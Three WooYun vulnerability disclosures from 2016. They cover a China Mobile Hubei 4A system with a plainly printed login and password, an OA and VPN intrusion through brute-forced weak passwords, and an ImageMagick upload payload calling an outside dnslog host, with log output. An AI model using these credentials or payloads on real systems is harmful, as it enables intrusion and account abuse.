漏洞详情披露状态： 2016-05-01： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：所谓的4A就是集中统一的账号（Account）管理、授权(Authorization)管理、认证（Authentication）管理和安全审计(Audit)，缺一不可。在这里结合具体情况谈谈在移动省公司或地级市公司建设4A项目的一些想法，仅供参考。详细说明：需要本人手机号和服务密码才可进行针对用户操作可直接充值手机话费和宽带现在已经无法下载了 管理员需要测试请私信我呢 http://mask 区域1.://**.**.**/HubeiESOPWEB/G3CRM_HuBei_Platform.apk 湖北 黄石地区code 区域mask 区域*****lei***** *****uha***** *****gju***** *****_hs***** ********** [email protected]/* */*****[email protected]/* */***** 登录4Achenyuhan_hs/HS@@1234code 区域mask 区域*****322*****  /服务密码后6位我测试了1元钱.希望原谅。。 漏洞证明：下载手机中国移动官方app 登录测试账号 查询缴费记录 已成功 修复方案：1.修复弱口令版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-05-05 20:02厂商回复：CNVD未复现所述情况，已经转由CNCERT向中国移动集团公司通报，由其后续协调网站管理部门处置。最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已经确认，细节仅向厂商公开2016-05-20： 细节向核心白帽子及相关领域专家公开2016-05-30： 细节向普通白帽子公开2016-06-09： 细节向实习白帽子公开2016-06-24： 细节向公众公开简要描述：三分天注定，七分靠打拼，剩下九十分全靠脸。详细说明：首先发现存在OA，http://**.**.**.**/jsoa/login.jsp 没有验证码,那就果断爆破，得到个账号gsh，123456 登陆进来看看吧通讯录，收集下信息，再来一次~~这次找到个另一个账号 hbr 12345678登陆邮箱,收集通讯录oa有个数据分析决策系统，根据邮箱通讯录，爆破得到多个用户，得到一堆VPN弱口令：likliuxin wangjuan wanglu zhanghan hubmajianguoliuyanyanxiyinghbrrwclwqhjwgsh sdyt连上VPN，大部分都是没多少权限的，最终发现个zhangyu的权限比较多，各种业务系统电子文件管理系统档案管理hr系统专家服务平台核心业务：出版社管理系统客户管理 漏洞证明：如上修复方案：各种弱口令，人员安全意识有待提高版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-05-10 15:16厂商回复：CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.最新状态：暂无

漏洞详情披露状态： 2016-05-31： 细节已通知厂商并且等待厂商处理中2016-05-31： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-01： 厂商已经主动忽略漏洞，细节向公众公开简要描述：命令执行详细说明：主站头像上传处参考：http://blog.knownsec.com/2016/05/imagemagick-popen-remote-command-execution-vulnerability/上传图片code 区域push graphic-context viewbox 0 0 640 480 image Over 0,0 0,0 '|host XXX.xxx.dnslog.info' pop graphic-context漏洞证明：cloudeye 检测到请求code 区域31-May-2016 14:24:43.165 queries: client 202.106.0.101#31926 (XXX.xxx.dnslog.info): query: XXX.xxx.dnslog.info IN A -EDC (128.199.200.236) 31-May-2016 14:24:43.593 queries: client 202.106.0.109#37736 (XXX.xxx.dnslog.info): query: XXX.xxx.dnslog.info IN AAAA -EDC (128.199.200.236) 31-May-2016 14:24:43.773 queries: client 202.106.0.101#42459 (XXX.xxx.dnslog.info): query: XXX.xxx.dnslog.info IN MX -EDC (128.199.200.236) 修复方案：目前官方已经更新代码至 Gitlab，但最终修复版本还未发布，补丁细节可参考如下链接：http://git.imagemagick.org/repos/ImageMagick/commit/40639d173aa8c76b850d625c630b711fee4dcfb http://git.imagemagick.org/repos/ImageMagick/commit/4674b3e1ea87a69646a6dbac8772c45eeb20c9f0 防御/etc/ImageMagick/policy.xml 文件中添加如下代码<policy domain="path" rights="none" pattern="|*"/>版权声明：转载请注明来源 niliu@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-01 10:32厂商回复：大虾，你好，经我们验证此漏洞无法利用。另外，你漏洞证明上检测到的请求ip不是有缘网的。。wooyun的审核不严谨，并不存在该漏洞，请删除，避免造成不良影响。漏洞Rank：15 (WooYun评价)最新状态：2016-06-01：白帽子提交的“cloudeye 检测到请求”的确不是有缘网的地址， 乌云审核第二次复测，[email protected]/* */， 希望乌云大神继续测！~2016-06-01：经过测试cloudeye，由于dns解析过程，显示的不是我公司的地址，白帽子的确触发了漏洞，很抱歉带来的一些列误会，希望给白帽子发礼物，十分感谢。